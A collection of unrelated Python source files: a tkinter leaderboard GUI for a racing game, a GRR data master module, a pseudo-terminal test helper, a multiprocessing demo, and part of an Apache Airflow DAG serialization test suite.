self.labels[grid_y][grid_x].configure(text="")
self.old_entries = copy.deepcopy(entries)
def clear_entries(self) -> None:
"""
Clear all entries in the table
"""
for grid_y in range(self.row):
for grid_x in range(self.column):
self.labels[grid_y][grid_x].configure(text="")
class App(tk.Tk):
def __init__(self, queue_in=None, info=None, *args, **kargs) -> None:
tk.Tk.__init__(self, *args, **kargs)
self.title("PyAccLeaderboard")
self.configure(background="black")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.font = Font(family="calibri", size=11)
self.info_font = Font(family="calibri", size=12)
# Base Frame
main_frame = tk.Frame(self, bg="black")
main_frame.grid(sticky=tk.NSEW)
main_frame.columnconfigure(0, weight=1)
# App Frame for leaderboard and orther info
app_frame = tk.Frame(main_frame, bd=2, relief=tk.SUNKEN)
app_frame.grid(row=0, column=1, sticky=tk.NSEW)
# Side Frame with track map and session info
# and application info
side_frame = tk.Frame(main_frame, bd=2)
side_frame.grid(row=0, column=0, sticky=tk.NSEW)
# Session Information
info_frame = tk.Frame(side_frame, bd=2, relief=tk.SUNKEN)
info_frame.grid(row=0, column=0, sticky=tk.NSEW)
self.session_info = []
self.build_session_info(info_frame, info["info"])
# Cavas to draw car position in real time
# Not working in ACC 1.5.9 :(
self.map_canvas = tk.Canvas(
side_frame, bd=2, width=256, height=256, relief=tk.SUNKEN)
self.map_canvas.grid(row=1, column=0, sticky=tk.NSEW)
# Application info
app_info_frame = tk.Frame(side_frame, bd=2, relief=tk.SUNKEN)
app_info_frame.grid(row=2, column=0)
self.app_info = []
self.create_app_info(app_info_frame)
# Create a Frame with the header
header_frame = tk.Frame(app_frame)
header_frame.grid(row=0, column=0, sticky=tk.NW, pady=(2, 0))
self.build_header(header_frame, info["table"])
frame_canvas = tk.Frame(app_frame)
frame_canvas.grid(row=1, column=0, pady=(5, 0), sticky=tk.NW)
canvas = tk.Canvas(frame_canvas)
canvas.grid(row=0, column=0, sticky=tk.NW)
# Create vertical scrollbar to move the table
v_scrollbar = tk.Scrollbar(
main_frame, orient=tk.VERTICAL, command=canvas.yview)
v_scrollbar.grid(row=0, column=2, sticky=tk.NS)
canvas.configure(yscrollcommand=v_scrollbar.set)
table_frame = tk.Frame(canvas)
self.table = Table(
table_frame, self.font, info["table"], "#c0c0c0", "#a0a0a0", 82)
canvas.create_window((0, 0), window=table_frame, anchor=tk.NW)
table_frame.update_idletasks()
bbox = canvas.bbox(tk.ALL)
w, h = bbox[2] - bbox[1], bbox[3] - bbox[1]
dw, dh = int((w / 14) * 14), int((h / 82) * 14)
canvas.configure(scrollregion=bbox, width=dw, height=dh)
self.queue_in = queue_in
self.data = None
self.local_data = {
"session": "",
"entries": {}
}
self.local_car_ids = []
self.delay = 500
self.after(self.delay, self.read_queue)
def read_queue(self) -> None:
logging.debug("Read Queue: reading queue")
# start = time.perf_counter()
try:
new_data = self.queue_in.get_nowait()
valide_data = True
for entry in new_data["entries"]:
if len(new_data["entries"][entry]) == 0:
valide_data = False
if valide_data:
self.data = new_data
self.update_local_entries()
self.table.update_text(self.data, self.local_data["entries"])
self.update_session()
# self.update_map() # Not working, ACC side
# end = time.perf_counter()
# print(f"Time: {(end - start) * 1000:.1f} ms")
self.update_app_info()
except queue.Empty:
logging.debug("Read Queue: queue empty")
self.after(self.delay, self.read_queue)
def create_app_info(self, parent):
cell_id = create_cell(
parent, "ID: ", font=self.info_font, anchor=tk.W,
relief=tk.RIDGE, max_width=32)
cell_id.grid(row=0, column=0, sticky=tk.NSEW)
self.app_info.append(cell_id)
cell_connected = create_cell(
parent, "Connected: ", font=self.info_font, anchor=tk.W,
relief=tk.RIDGE, max_width=32)
cell_connected.grid(row=1, column=0, sticky=tk.NSEW)
self.app_info.append(cell_connected)
info_text = "Made With love by Ryan Rennoir\nVersion 0.7.3"
cell_info = create_cell(
parent, info_text, font=self.info_font, anchor=tk.W,
relief=tk.RIDGE, max_width=32, height=2)
cell_info.grid(row=2, column=0, sticky=tk.NSEW)
# self.app_info.append(cell_info) No need it won't be updated
def update_app_info(self):
for i, cell in enumerate(self.app_info):
if i == 0:
c_id = self.data["connection"]["id"]
cell.configure(text=f"ID: {c_id}")
if i == 1:
connected = self.data["connection"]["connected"]
if connected:
cell.configure(text=f"Connected: {connected}", bg="green")
else:
cell.configure(text=f"Connected: {connected}", bg="red")
def update_map(self):
# Not woking in 1.5.9
# world pos x and y are always 0 :(
for key in self.data["entries"].keys():
_ = self.data["entries"][key]["world_pos_x"]
_ = self.data["entries"][key]["world_pos_y"]
# self.map_canvas.create_oval(x, y, x + 1, y + 1, fill="red")
def update_local_entries(self) -> None:
entries = self.data["entries"]
local_entries = self.local_data["entries"]
session = self.data["session"]["session_type"]
local_session = self.local_data["session"]
new_entries = False
if len(entries) != len(local_entries):
new_entries = True
else:
for key in entries.keys():
if entries[key]["car_id"] not in local_entries:
new_entries = True
if new_entries:
logging.debug("Reviced new entry list")
new_data = {}
for key in entries.keys():
car_id = entries[key]["car_id"]
if car_id in local_entries:
new_data.update({car_id: local_entries[car_id]})
else:
new_data.update({car_id: {
"location": "Pitlane",
"pits": 0
}})
self.local_data.update({"entries": new_data})
logging.debug("Clearing leaderboard cell...")
self.table.clear_entries()
elif session != local_session:
for car_id in local_entries:
local_entries.update({car_id: {
"location": "Pitlane",
"pits": 0
}})
self.local_data["session"] = session
else:
for car_id in local_entries:
previous = local_entries[car_id]["location"]
actual = entries[car_id]["car_location"]
if previous == "Track" and actual != "Track":
local_entries[car_id]["pits"] += 1
local_entries[car_id]["location"] = actual
def build_session_info(self, parent, info) -> None:
for i in range(len(info)):
width = 32 # info[i]["width"]
cell = create_cell(
parent, "", font=self.info_font,
max_width=width, relief=tk.RIDGE, anchor=tk.W)
cell.grid(row=i, column=0, pady=2, sticky=tk.NW)
self.session_info.append(cell)
def update_session(self) -> None:
session = self.data["session"]
if len(session) > 0:
for i, cell in enumerate(self.session_info):
if i == 0:
cell.configure(text=f"Track: {session['track']}")
if i == 1:
cell.configure(text=f"Session: {session['session_type']}")
elif i == 2:
time_left = from_date_time(session["session_end_time"])
cell.configure(text=f"Time left: {time_left}")
elif i == 3:
time_elapsed = from_date_time(session['session_time'])
cell.configure(text=f"Time elapsed: {time_elapsed}")
elif i == 4:
air_temps = session["air_temp"]
cell.configure(text=f"Air: {air_temps}°C")
elif i == 5:
track_temps = session["track_temp"]
cell.configure(text=f"Track: {track_temps}°C")
def build_header(self, parent, header) -> None:
for column, info in enumerate(header):
text = info["text"]
color = "#8a8a8a"
width = info["width"]
if column == 4:
# Put Team and Driver name to the far left of the cell
cell = create_cell(parent, text, color,
self.font, width, 2, tk.W)
else:
cell = create_cell(parent, text, color, self.font, width, 2)
if column == 0:
cell.grid(row=0, column=column, padx=(3, 1), sticky=tk.NSEW)
else:
cell.grid(row=0, column=column, padx=1, sticky=tk.NSEW)
def acc_run(info: dict, q: queue.Queue):
logging.debug("Starting ACC Worker Thread...")
global stop_worker
socket = info["socket"]
ip = info["ip"]
port = info["port"]
name = info["name"]
password = info["password"]
speed = info["speed"]
cmd_password = info["cmd_password"]
instance = accProtocol.Leaderboard(socket, ip, port)
instance.connect(name, password, speed, cmd_password)
last_connection = datetime.datetime.now()
last_message = datetime.datetime.now()
while not stop_worker:
now = datetime.datetime.now()
# if connection was lost or not established wait 2s before asking again
if (not instance.connected and
(now - last_connection).total_seconds() > 2):
instance.connect(name, password, speed, cmd_password)
last_connection = datetime.datetime.now()
else:
instance.update()
# Send data to the queue at the same rate
# as the GUI check the queue
if (now - last_message).total_seconds() > 0.550:
data_copy = copy.deepcopy(instance.leaderboard_data)
last_message = now
q.put(data_copy)
logging.debug("Closing ACC Worker Thread...")
instance.disconnect()
stop_worker = False
if __name__ == "__main__":
gui_info = {
"info": [
{
"layout": "Track",
"width": 20
},
{
"layout": "Session",
"width": 16
},
{
"layout": "Time left",
"width": 17
},
{
"layout": "Time elapsed",
"width": 21
},
{
"layout": "Air Temps",
"width": 9
},
{
"layout": "Track Temps",
"width": 11
}
],
"table": [
{
"text": "Rank",
"width": 4
},
{
"text": "Car",
"width": 3
},
{
"text": "Class",
"width": 5
},
{
"text": "Brand",
"width": 5
},
{
"text": "Team\nDriver",
"width": 30
},
{
"text": "Best",
"width": 8
},
{
"text": "Current",
"width": 8
},
{
"text": "Lap",
"width": 3
},
{
"text": "Last\nGap",
"width": 8
},
{
"text": "S1",
"width": 8
},
{
"text": "S2",
"width": 8
},
{
"text": "S3",
"width": 8
},
{
"text": "Stops",
"width": 5
},
{
# Location
"text": "",
"width": 3
}
]
}
args = sys.argv
argc = len(args)
ip = "127.0.0.1"
port = 9000
for arg in args:
if arg.startswith("-ip"):
ip = args[1][3:]
if arg.startswith("-p"):
port = int(arg[2:])
log_format = "%(asctime)s - %(levelname)s: %(message)s"
time_format = "%H:%M:%S"
if "-debug" in args:
logging.basicConfig(format=log_format,
level=logging.DEBUG, datefmt=time_format)
else:
logging.basicConfig(format=log_format,
level=logging.WARNING, datefmt=time_format)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("", 3400))
instance_info = {
"ip": ip,
"port": port,
"socket": sock,
"name": "Ryan Rennoir",
"password": "asd",
"speed": 250,
"cmd_password": ""
}
q = queue.Queue()
thread_acc = threading.Thread(target=acc_run, args=(instance_info, q))
thread_acc.start()
app = App(queue_in=q, info=gui_info)
app.mainloop()
stop_worker = True
thread_acc.join()
sock.close()
logging.debug("Socket closed")
|
master.py
|
#!/usr/bin/env python
"""Data master specific classes."""
import socket
import threading
import urlparse
import urllib3
from urllib3 import connectionpool
import logging
from grr.lib import config_lib
from grr.lib import rdfvalue
from grr.lib import utils
from grr.server.data_server import constants
from grr.server.data_server import rebalance
from grr.server.data_server import utils as sutils
class DataMasterError(Exception):
"""Raised when some critical error happens in the data master."""
pass
class DataServer(object):
"""DataServer objects for each data server."""
def __init__(self, location, index):
# Parse location.
loc = urlparse.urlparse(location, scheme="http")
offline = rdfvalue.DataServerState.Status.OFFLINE
state = rdfvalue.DataServerState(size=0, load=0, status=offline)
self.server_info = rdfvalue.DataServerInformation(index=index,
address=loc.hostname,
port=loc.port,
state=state)
self.registered = False
self.removed = False
logging.info("Configured DataServer on %s:%d", self.Address(), self.Port())
def SetInitialInterval(self, num_servers):
self.server_info.interval = sutils.CreateStartInterval(self.Index(),
num_servers)
def IsRegistered(self):
return self.registered
def Matches(self, addr, port):
if isinstance(addr, list):
if self.Address() not in addr:
return False
else:
# Handle hostnames and IPs
if socket.gethostbyname(self.Address()) != socket.gethostbyname(addr):
return False
return self.Port() == port
def Register(self):
"""Once the server is registered, it is allowed to use the database."""
self.registered = True
def Deregister(self):
self.registered = False
def Port(self):
return self.server_info.port
def Address(self):
return self.server_info.address
def Index(self):
return self.server_info.index
def SetIndex(self, newindex):
self.server_info.index = newindex
def Size(self):
return self.server_info.state.size
def Load(self):
return self.server_info.state.load
def Interval(self):
return self.server_info.interval
def SetInterval(self, start, end):
self.server_info.interval.start = start
self.server_info.interval.end = end
def GetInfo(self):
return self.server_info
def UpdateState(self, newstate):
"""Update state of server."""
self.server_info.state = newstate
def Remove(self):
self.removed = True
def WasRemoved(self):
return self.removed
class DataMaster(object):
"""DataMaster information."""
def __init__(self, myport, service):
self.service = service
stores = config_lib.CONFIG["Dataserver.server_list"]
if not stores:
logging.error("Dataserver.server_list is empty: no data servers will"
" be available")
raise DataMasterError("Dataserver.server_list is empty")
self.servers = [DataServer(loc, idx) for idx, loc in enumerate(stores)]
self.registered_count = 0
# Load server mapping.
self.mapping = self.service.LoadServerMapping()
if not self.mapping:
# Bootstrap mapping.
# Each server information is linked to its corresponding object.
# Updating the data server object will reflect immediately on
# the mapping.
for server in self.servers:
server.SetInitialInterval(len(self.servers))
servers_info = [server.server_info for server in self.servers]
self.mapping = rdfvalue.DataServerMapping(version=0,
num_servers=len(self.servers),
servers=servers_info)
self.service.SaveServerMapping(self.mapping, create_pathing=True)
else:
# Check mapping and configuration matching.
if len(self.mapping.servers) != len(self.servers):
raise DataMasterError("Server mapping does not correspond "
"to the configuration.")
for server in self.servers:
self._EnsureServerInMapping(server)
# Create locks.
self.server_lock = threading.Lock()
# Register the master.
self.myself = self.servers[0]
if self.myself.Port() == myport:
self._DoRegisterServer(self.myself)
else:
logging.warning("First server in Dataserver.server_list is not the "
"master. Found port '%i' but my port is '%i'. If you"
" really are running master, you may want to specify"
" flag --port %i.",
self.myself.Port(), myport, myport)
raise DataMasterError("First server in Dataserver.server_list must be "
"the master.")
# Start database measuring thread.
sleep = config_lib.CONFIG["Dataserver.stats_frequency"]
self.periodic_thread = utils.InterruptableThread(
target=self._PeriodicThread, sleep_time=sleep)
self.periodic_thread.start()
# Holds current rebalance operation.
self.rebalance = None
self.rebalance_pool = []
def LoadMapping(self):
return self.mapping
def _PeriodicThread(self):
"""Periodically update our state and store the mappings."""
ok = rdfvalue.DataServerState.Status.AVAILABLE
num_components, avg_component = self.service.GetComponentInformation()
state = rdfvalue.DataServerState(size=self.service.Size(),
load=0,
status=ok,
num_components=num_components,
avg_component=avg_component)
self.myself.UpdateState(state)
self.service.SaveServerMapping(self.mapping)
def _EnsureServerInMapping(self, server):
"""Ensure that the data server exists on the mapping."""
index = server.Index()
server_info = self.mapping.servers[index]
if server_info.address != server.Address():
return False
if server_info.port != server.Port():
return False
# Change underlying server information.
server.server_info = server_info
def RegisterServer(self, addr, port):
"""Register incoming data server. Return server object."""
for server in self.servers:
if server == self.myself:
continue
if server.Matches(addr, port):
with self.server_lock:
if server.IsRegistered():
return None
else:
self._DoRegisterServer(server)
return server
return None
def HasServer(self, addr, port):
"""Checks if a given server is already in the set."""
for server in self.servers:
if server.Matches(addr, port):
return server
return None
def _DoRegisterServer(self, server):
self.registered_count += 1
server.Register()
logging.info("Registered server %s:%d", server.Address(), server.Port())
if self.AllRegistered():
logging.info("All data servers have registered!")
def DeregisterServer(self, server):
"""Deregister a data server."""
with self.server_lock:
server.Deregister()
self.registered_count -= 1
def AllRegistered(self):
"""Check if all servers have registered."""
return self.registered_count == len(self.servers)
def Stop(self):
self.service.SaveServerMapping(self.mapping)
self.periodic_thread.Stop()
def SetRebalancing(self, reb):
"""Sets a new rebalance operation and starts communication with servers."""
self.rebalance = reb
self.rebalance_pool = []
try:
for serv in self.servers:
pool = connectionpool.HTTPConnectionPool(serv.Address(),
port=serv.Port())
self.rebalance_pool.append(pool)
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return False
return True
def CancelRebalancing(self):
self.rebalance = None
for pool in self.rebalance_pool:
pool.close()
self.rebalance_pool = []
def IsRebalancing(self):
return self.rebalance
def AddServer(self, addr, port):
"""Add new server to the group."""
server = DataServer("http://%s:%d" % (addr, port), len(self.servers))
self.servers.append(server)
server.SetInterval(constants.MAX_RANGE, constants.MAX_RANGE)
self.mapping.servers.Append(server.GetInfo())
self.mapping.num_servers += 1
# At this point, the new server is now part of the group.
return server
def RemoveServer(self, removed_server):
"""Remove a server. Returns None if server interval is not empty."""
interval = removed_server.Interval()
# Interval range must be 0.
if interval.start != interval.end:
return None
# Update ids of other servers.
newserverlist = []
for serv in self.servers:
if serv == removed_server:
continue
if serv.Index() > removed_server.Index():
serv.SetIndex(serv.Index() - 1)
newserverlist.append(serv.GetInfo())
# Change list of servers.
self.mapping.servers = newserverlist
self.mapping.num_servers -= 1
self.servers.pop(removed_server.Index())
self.DeregisterServer(removed_server)
removed_server.Remove()
return removed_server
def SyncMapping(self, skip=None):
"""Syncs mapping with other servers."""
pools = []
try:
# Update my state.
self._PeriodicThread()
for serv in self.servers[1:]:
if skip and serv in skip:
continue
pool = connectionpool.HTTPConnectionPool(serv.Address(),
port=serv.Port())
pools.append((serv, pool))
body = self.mapping.SerializeToString()
headers = {"Content-Length": len(body)}
for serv, pool in pools:
res = pool.urlopen("POST", "/servers/sync", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
logging.warning("Could not sync with server %s:%d", serv.Address(),
serv.Port())
return False
state = rdfvalue.DataServerState()
state.ParseFromString(res.data)
serv.UpdateState(state)
except urllib3.exceptions.MaxRetryError:
return False
finally:
for _, pool in pools:
pool.close()
return True
def FetchRebalanceInformation(self):
"""Asks data servers for number of changes for rebalancing."""
body = self.rebalance.SerializeToString()
size = len(body)
headers = {"Content-Length": size}
for pool in self.rebalance_pool:
try:
res = pool.urlopen("POST", "/rebalance/statistics", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
self.CancelRebalancing()
return False
reb = rdfvalue.DataServerRebalance()
reb.ParseFromString(res.data)
ls = list(reb.moving)
if ls:
logging.warning("Moving %d", ls[0])
self.rebalance.moving.Append(ls[0])
else:
self.CancelRebalancing()
return False
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return False
return True
def CopyRebalanceFiles(self):
"""Tell servers to copy files to the corresponding servers."""
body = self.rebalance.SerializeToString()
size = len(body)
headers = {"Content-Length": size}
for pool in self.rebalance_pool:
try:
res = pool.urlopen("POST", "/rebalance/copy", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
self.CancelRebalancing()
return False
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return False
return True
def RebalanceCommit(self):
"""Tell servers to commit rebalance changes."""
# Save rebalance information to a file, so we can recover later.
rebalance.SaveCommitInformation(self.rebalance)
body = self.rebalance.SerializeToString()
size = len(body)
headers = {"Content-Length": size}
for i, pool in enumerate(self.rebalance_pool):
try:
res = pool.urlopen("POST", "/rebalance/perform", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
logging.error("Server %d failed to perform transaction %s", i,
self.rebalance.id)
self.CancelRebalancing()
return None
stat = rdfvalue.DataServerState()
stat.ParseFromString(res.data)
data_server = self.servers[i]
data_server.UpdateState(stat)
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return None
# Update server intervals.
mapping = self.rebalance.mapping
for i, serv in enumerate(list(self.mapping.servers)):
serv.interval = mapping.servers[i].interval
self.rebalance.mapping = self.mapping
self.service.SaveServerMapping(self.mapping)
# We can finally delete the temporary file, since we have succeeded.
rebalance.DeleteCommitInformation(self.rebalance)
rebalance.RemoveDirectory(self.rebalance)
self.CancelRebalancing()
return self.mapping
|
__init__.py
|
import threading
import os
import pty
def create_dummy_port(responses):
def listener(port):
# continuously listen to commands on the master device
while 1:
res = b''
while not res.endswith(b"\r"):
# keep reading one byte at a time until we have a full line
res += os.read(port, 1)
print("command: %s" % res)
# write back the response
if res in responses:
resp = responses[res]
del responses[res]
os.write(port, resp)
master, slave = pty.openpty()
thread = threading.Thread(target=listener, args=[master], daemon=True)
thread.start()
return os.ttyname(slave)
|
waiting_for_processes.py
|
#!/usr/bin/env python
# encoding: utf-8
import multiprocessing
import time
import sys
def daemon():
print 'Starting:', multiprocessing.current_process().name
time.sleep(2)
print 'Exiting :', multiprocessing.current_process().name
def non_daemon():
print 'Starting:', multiprocessing.current_process().name
print 'Exiting :', multiprocessing.current_process().name
if __name__ == '__main__':
d = multiprocessing.Process(name='daemon', target=daemon)
d.daemon = True
n = multiprocessing.Process(name='non-daemon', target=non_daemon)
n.daemon = False
d.start()
time.sleep(1)
n.start()
d.join()
n.join()
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: 'Hello %s' % name},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
@pytest.mark.quarantined
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
